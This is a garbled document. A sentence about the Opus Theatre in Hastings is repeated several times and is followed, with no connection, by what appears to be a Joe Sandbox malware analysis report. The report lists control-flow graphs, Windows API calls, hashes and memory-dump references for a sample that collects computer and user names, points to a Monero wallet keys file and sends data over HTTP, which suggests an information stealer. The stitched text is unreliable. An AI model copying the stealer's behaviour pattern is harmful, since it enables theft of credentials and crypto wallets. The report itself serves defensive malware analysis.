British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 92cb8141e72b4fbfc1e7b1fab95b841adc14196f8c5edee2eedfeebf2d26a1b1
                                • Instruction ID: 39e52d6ccc9f641453cad8f004a839c03eecf0cab7dd3f83c2c1f474e6f07854
                                • Opcode Fuzzy Hash: 92cb8141e72b4fbfc1e7b1fab95b841adc14196f8c5edee2eedfeebf2d26a1b1
                                • Instruction Fuzzy Hash: F94178A17C1604FAE676B7A4A84ED9D7352FFCA709F806143ED60923C4DFB4650047B1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 8b4880-8b4942 call 8ca7a0 call 8b47b0 call 8ca740 * 5 InternetOpenA StrCmpCA 816 8b494b-8b494f 801->816 817 8b4944 801->817 818 8b4ecb-8b4ef3 InternetCloseHandle call 8caad0 call 8b9ac0 816->818 819 8b4955-8b4acd call 8c8b60 call 8ca920 call 8ca8a0 call 8ca800 * 2 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca920 call 8ca8a0 call 8ca800 * 2 InternetConnectA 816->819 817->816 829 8b4f32-8b4fa2 call 8c8990 * 2 call 8ca7a0 call 8ca800 * 8 818->829 830 8b4ef5-8b4f2d call 8ca820 call 8ca9b0 call 8ca8a0 call 8ca800 818->830 819->818 905 8b4ad3-8b4ad7 819->905 830->829 906 8b4ad9-8b4ae3 905->906 907 8b4ae5 905->907 908 8b4aef-8b4b22 HttpOpenRequestA 906->908 907->908 909 8b4b28-8b4e28 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca740 call 8ca920 * 2 call 8ca8a0 call 8ca800 * 2 call 8caad0 lstrlen call 8caad0 * 2 lstrlen call 8caad0 HttpSendRequestA 908->909 910 8b4ebe-8b4ec5 InternetCloseHandle 908->910 1021 8b4e32-8b4e5c InternetReadFile 909->1021 910->818 1022 8b4e5e-8b4e65 1021->1022 1023 8b4e67-8b4eb9 InternetCloseHandle call 8ca800 1021->1023 1022->1023 1024 8b4e69-8b4ea7 call 8ca9b0 call 8ca8a0 call 8ca800 1022->1024 1023->910 1024->1021
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008B4915
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008D0DDB,00000000,?,?,00000000,?,",00000000,?,007BE250), ref: 008B4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008B4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008B4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008B4E49
                                • InternetCloseHandle.WININET(00000000), ref: 008B4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 008B4EC5
                                • HttpOpenRequestA.WININET(00000000,007BE2F0,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B4B15
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • InternetCloseHandle.WININET(00000000), ref: 008B4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------$P{$p{$p{
                                • API String ID: 460715078-799811875
                                • Opcode ID: 1336d73ae642df7dcd55c386020f356a5477235d8036634a24e0cb6d6486dbde
                                • Instruction ID: 8ca2b7abe8341718c3fbd10aa5d476ee3e2c4795d8dcfcaf280c7955ff6d247c
                                • Opcode Fuzzy Hash: 1336d73ae642df7dcd55c386020f356a5477235d8036634a24e0cb6d6486dbde
                                • Instruction Fuzzy Hash: D312D77191011CABDB19EB94DC92FEEB738FF14304F5041ADB106A2191EF70AE4ACB66
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 008C792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 4c99ba31c83c2c8bd6a77c54cc4b5db9052699eaa404cfcaa99e35e84e07aa9e
                                • Instruction ID: f4defaada655af7f12af43a9b046d29e705d0eb836013aefa6f71268206d04fb
                                • Opcode Fuzzy Hash: 4c99ba31c83c2c8bd6a77c54cc4b5db9052699eaa404cfcaa99e35e84e07aa9e
                                • Instruction Fuzzy Hash: 300162B1904208EFC700DFD4DD45FAABBB8F704B65F10421AE645E3280C37899048BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008B11B7), ref: 008C7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 008C789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: a4659f8cc279dfe576117fc08005c36e9efa1fdea9c4a9703c628bb7cc188f0e
                                • Instruction ID: 18b7fdbf3f84bde9a791c870757a9906fbafadcc40661f20ba772241088a4668
                                • Opcode Fuzzy Hash: a4659f8cc279dfe576117fc08005c36e9efa1fdea9c4a9703c628bb7cc188f0e
                                • Instruction Fuzzy Hash: 5CF031F2944208ABC700DFD5DD45FAABBB8F704761F100159EA15E3680C7745505CBE1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 5760a82d0353ef4dfb14b6dcf94d1a90e623fc905af204f753b94296d4a0e7da
                                • Instruction ID: 8880b55551bbd97dd5c49863cc53bcfc2e3852857854d0aa7bc7184f0bf82863
                                • Opcode Fuzzy Hash: 5760a82d0353ef4dfb14b6dcf94d1a90e623fc905af204f753b94296d4a0e7da
                                • Instruction Fuzzy Hash: C8D05EB490030CDBCB00EFE0D849AEDBB78FB08311F001554D909B2340EA306482CBA6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 8c9c10-8c9c1a 634 8ca036-8ca0ca LoadLibraryA * 8 633->634 635 8c9c20-8ca031 GetProcAddress * 43 633->635 636 8ca0cc-8ca141 GetProcAddress * 5 634->636 637 8ca146-8ca14d 634->637 635->634 636->637 638 8ca216-8ca21d 637->638 639 8ca153-8ca211 GetProcAddress * 8 637->639 640 8ca21f-8ca293 GetProcAddress * 5 638->640 641 8ca298-8ca29f 638->641 639->638 640->641 642 8ca2a5-8ca332 GetProcAddress * 6 641->642 643 8ca337-8ca33e 641->643 642->643 644 8ca41f-8ca426 643->644 645 8ca344-8ca41a GetProcAddress * 9 643->645 646 8ca428-8ca49d GetProcAddress * 5 644->646 647 8ca4a2-8ca4a9 644->647 645->644 646->647 648 8ca4dc-8ca4e3 647->648 649 8ca4ab-8ca4d7 GetProcAddress * 2 647->649 650 8ca515-8ca51c 648->650 651 8ca4e5-8ca510 GetProcAddress * 2 648->651 649->648 652 8ca612-8ca619 650->652 653 8ca522-8ca60d GetProcAddress * 10 650->653 651->650 654 8ca67d-8ca684 652->654 655 8ca61b-8ca678 GetProcAddress * 4 652->655 653->652 656 8ca69e-8ca6a5 654->656 657 8ca686-8ca699 GetProcAddress 654->657 655->654 658 8ca708-8ca709 656->658 659 8ca6a7-8ca703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(76F70000,007A63E0), ref: 008C9C2D
                                • GetProcAddress.KERNEL32(76F70000,007A65A0), ref: 008C9C45
                                • GetProcAddress.KERNEL32(76F70000,007B8F70), ref: 008C9C5E
                                • GetProcAddress.KERNEL32(76F70000,007B8EE0), ref: 008C9C76
                                • GetProcAddress.KERNEL32(76F70000,007BC798), ref: 008C9C8E
                                • GetProcAddress.KERNEL32(76F70000,007BC780), ref: 008C9CA7
                                • GetProcAddress.KERNEL32(76F70000,007AB0F8), ref: 008C9CBF
                                • GetProcAddress.KERNEL32(76F70000,007BC7E0), ref: 008C9CD7
                                • GetProcAddress.KERNEL32(76F70000,007BC7B0), ref: 008C9CF0
                                • GetProcAddress.KERNEL32(76F70000,007BC660), ref: 008C9D08
                                • GetProcAddress.KERNEL32(76F70000,007BC768), ref: 008C9D20
                                • GetProcAddress.KERNEL32(76F70000,007A6320), ref: 008C9D39
                                • GetProcAddress.KERNEL32(76F70000,007A6240), ref: 008C9D51
                                • GetProcAddress.KERNEL32(76F70000,007A6520), ref: 008C9D69
                                • GetProcAddress.KERNEL32(76F70000,007A6400), ref: 008C9D82
                                • GetProcAddress.KERNEL32(76F70000,007BC750), ref: 008C9D9A
                                • GetProcAddress.KERNEL32(76F70000,007BC678), ref: 008C9DB2
                                • GetProcAddress.KERNEL32(76F70000,007AB238), ref: 008C9DCB
                                • GetProcAddress.KERNEL32(76F70000,007A6420), ref: 008C9DE3
                                • GetProcAddress.KERNEL32(76F70000,007BC7C8), ref: 008C9DFB
                                • GetProcAddress.KERNEL32(76F70000,007BC630), ref: 008C9E14
                                • GetProcAddress.KERNEL32(76F70000,007BC6C0), ref: 008C9E2C
                                • GetProcAddress.KERNEL32(76F70000,007BC648), ref: 008C9E44
                                • GetProcAddress.KERNEL32(76F70000,007A6460), ref: 008C9E5D
                                • GetProcAddress.KERNEL32(76F70000,007BC690), ref: 008C9E75
                                • GetProcAddress.KERNEL32(76F70000,007BC6A8), ref: 008C9E8D
                                • GetProcAddress.KERNEL32(76F70000,007BC6D8), ref: 008C9EA6
                                • GetProcAddress.KERNEL32(76F70000,007BC708), ref: 008C9EBE
                                • GetProcAddress.KERNEL32(76F70000,007BC6F0), ref: 008C9ED6
                                • GetProcAddress.KERNEL32(76F70000,007BC720), ref: 008C9EEF
                                • GetProcAddress.KERNEL32(76F70000,007BC738), ref: 008C9F07
                                • GetProcAddress.KERNEL32(76F70000,007BC2B8), ref: 008C9F1F
                                • GetProcAddress.KERNEL32(76F70000,007BC120), ref: 008C9F38
                                • GetProcAddress.KERNEL32(76F70000,007BCEC8), ref: 008C9F50
                                • GetProcAddress.KERNEL32(76F70000,007BC030), ref: 008C9F68
                                • GetProcAddress.KERNEL32(76F70000,007BC258), ref: 008C9F81
                                • GetProcAddress.KERNEL32(76F70000,007A6480), ref: 008C9F99
                                • GetProcAddress.KERNEL32(76F70000,007BC1F8), ref: 008C9FB1
                                • GetProcAddress.KERNEL32(76F70000,007A64A0), ref: 008C9FCA
                                • GetProcAddress.KERNEL32(76F70000,007BC210), ref: 008C9FE2
                                • GetProcAddress.KERNEL32(76F70000,007BC0C0), ref: 008C9FFA
                                • GetProcAddress.KERNEL32(76F70000,007A64C0), ref: 008CA013
                                • GetProcAddress.KERNEL32(76F70000,007A6580), ref: 008CA02B
                                • LoadLibraryA.KERNEL32(007BC270,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA03D
                                • LoadLibraryA.KERNEL32(007BC228,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA04E
                                • LoadLibraryA.KERNEL32(007BC240,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA060
                                • LoadLibraryA.KERNEL32(007BC288,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA072
                                • LoadLibraryA.KERNEL32(007BC0D8,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA083
                                • LoadLibraryA.KERNEL32(007BC2D0,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA095
                                • LoadLibraryA.KERNEL32(007BC2E8,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA0A7
                                • LoadLibraryA.KERNEL32(007BC300,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA0B8
                                • GetProcAddress.KERNEL32(75840000,007A6700), ref: 008CA0DA
                                • GetProcAddress.KERNEL32(75840000,007BC090), ref: 008CA0F2
                                • GetProcAddress.KERNEL32(75840000,007B8A98), ref: 008CA10A
                                • GetProcAddress.KERNEL32(75840000,007BC2A0), ref: 008CA123
                                • GetProcAddress.KERNEL32(75840000,007A67E0), ref: 008CA13B
                                • GetProcAddress.KERNEL32(73B90000,007AAE00), ref: 008CA160
                                • GetProcAddress.KERNEL32(73B90000,007A6620), ref: 008CA179
                                • GetProcAddress.KERNEL32(73B90000,007AAF68), ref: 008CA191
                                • GetProcAddress.KERNEL32(73B90000,007BC318), ref: 008CA1A9
                                • GetProcAddress.KERNEL32(73B90000,007BC060), ref: 008CA1C2
                                • GetProcAddress.KERNEL32(73B90000,007A6640), ref: 008CA1DA
                                • GetProcAddress.KERNEL32(73B90000,007A6740), ref: 008CA1F2
                                • GetProcAddress.KERNEL32(73B90000,007BC078), ref: 008CA20B
                                • GetProcAddress.KERNEL32(760B0000,007A6880), ref: 008CA22C
                                • GetProcAddress.KERNEL32(760B0000,007A67C0), ref: 008CA244
                                • GetProcAddress.KERNEL32(760B0000,007BC0A8), ref: 008CA25D
                                • GetProcAddress.KERNEL32(760B0000,007BC048), ref: 008CA275
                                • GetProcAddress.KERNEL32(760B0000,007A68E0), ref: 008CA28D
                                • GetProcAddress.KERNEL32(75D30000,007AB148), ref: 008CA2B3
                                • GetProcAddress.KERNEL32(75D30000,007AAF90), ref: 008CA2CB
                                • GetProcAddress.KERNEL32(75D30000,007BC198), ref: 008CA2E3
                                • GetProcAddress.KERNEL32(75D30000,007A68A0), ref: 008CA2FC
                                • GetProcAddress.KERNEL32(75D30000,007A6840), ref: 008CA314
                                • GetProcAddress.KERNEL32(75D30000,007AAEC8), ref: 008CA32C
                                • GetProcAddress.KERNEL32(753A0000,007BC0F0), ref: 008CA352
                                • GetProcAddress.KERNEL32(753A0000,007A6720), ref: 008CA36A
                                • GetProcAddress.KERNEL32(753A0000,007B8B58), ref: 008CA382
                                • GetProcAddress.KERNEL32(753A0000,007BC108), ref: 008CA39B
                                • GetProcAddress.KERNEL32(753A0000,007BC180), ref: 008CA3B3
                                • GetProcAddress.KERNEL32(753A0000,007A65E0), ref: 008CA3CB
                                • GetProcAddress.KERNEL32(753A0000,007A65C0), ref: 008CA3E4
                                • GetProcAddress.KERNEL32(753A0000,007BC138), ref: 008CA3FC
                                • GetProcAddress.KERNEL32(753A0000,007BC150), ref: 008CA414
                                • GetProcAddress.KERNEL32(76DA0000,007A66A0), ref: 008CA436
                                • GetProcAddress.KERNEL32(76DA0000,007BC168), ref: 008CA44E
                                • GetProcAddress.KERNEL32(76DA0000,007BC1B0), ref: 008CA466
                                • GetProcAddress.KERNEL32(76DA0000,007BC1C8), ref: 008CA47F
                                • GetProcAddress.KERNEL32(76DA0000,007BC1E0), ref: 008CA497
                                • GetProcAddress.KERNEL32(77300000,007A6800), ref: 008CA4B8
                                • GetProcAddress.KERNEL32(77300000,007A6820), ref: 008CA4D1
                                • GetProcAddress.KERNEL32(767E0000,007A6600), ref: 008CA4F2
                                • GetProcAddress.KERNEL32(767E0000,007BC450), ref: 008CA50A
                                • GetProcAddress.KERNEL32(6F8E0000,007A6660), ref: 008CA530
                                • GetProcAddress.KERNEL32(6F8E0000,007A67A0), ref: 008CA548
                                • GetProcAddress.KERNEL32(6F8E0000,007A6760), ref: 008CA560
                                • GetProcAddress.KERNEL32(6F8E0000,007BC600), ref: 008CA579
                                • GetProcAddress.KERNEL32(6F8E0000,007A6680), ref: 008CA591
                                • GetProcAddress.KERNEL32(6F8E0000,007A6860), ref: 008CA5A9
                                • GetProcAddress.KERNEL32(6F8E0000,007A68C0), ref: 008CA5C2
                                • GetProcAddress.KERNEL32(6F8E0000,007A6900), ref: 008CA5DA
                                • GetProcAddress.KERNEL32(6F8E0000,InternetSetOptionA), ref: 008CA5F1
                                • GetProcAddress.KERNEL32(6F8E0000,HttpQueryInfoA), ref: 008CA607
                                • GetProcAddress.KERNEL32(75760000,007BC3D8), ref: 008CA629
                                • GetProcAddress.KERNEL32(75760000,007B89B8), ref: 008CA641
                                • GetProcAddress.KERNEL32(75760000,007BC480), ref: 008CA659
                                • GetProcAddress.KERNEL32(75760000,007BC5A0), ref: 008CA672
                                • GetProcAddress.KERNEL32(762C0000,007A66C0), ref: 008CA693
                                • GetProcAddress.KERNEL32(6D6E0000,007BC378), ref: 008CA6B4
                                • GetProcAddress.KERNEL32(6D6E0000,007A66E0), ref: 008CA6CD
                                • GetProcAddress.KERNEL32(6D6E0000,007BC618), ref: 008CA6E5
                                • GetProcAddress.KERNEL32(6D6E0000,007BC4E0), ref: 008CA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: cz$ dz$ ez$ fz$ gz$ hz$@bz$@fz$@gz$@hz$HttpQueryInfoA$InternetSetOptionA$`dz$`fz$`gz$`hz$cz$ez$fz$gz$hz
                                • API String ID: 2238633743-1470533211
                                • Opcode ID: 97eddf3d2d878d223af2d9d0bf25d9ddc1dc7b356641e2682c94f49667b8dd5f
                                • Instruction ID: bf764a63f05376884bf18ed6a04f347326cd1a43f9d7d062864f8df4465fbedc
                                • Opcode Fuzzy Hash: 97eddf3d2d878d223af2d9d0bf25d9ddc1dc7b356641e2682c94f49667b8dd5f
                                • Instruction Fuzzy Hash: B76217F6600201AFC344EBE9ED88DF67BF9F7AC341714851AA60DC3264D679A843DB52

                                Control-flow Graph

                                • Executed
                                • Not Executed
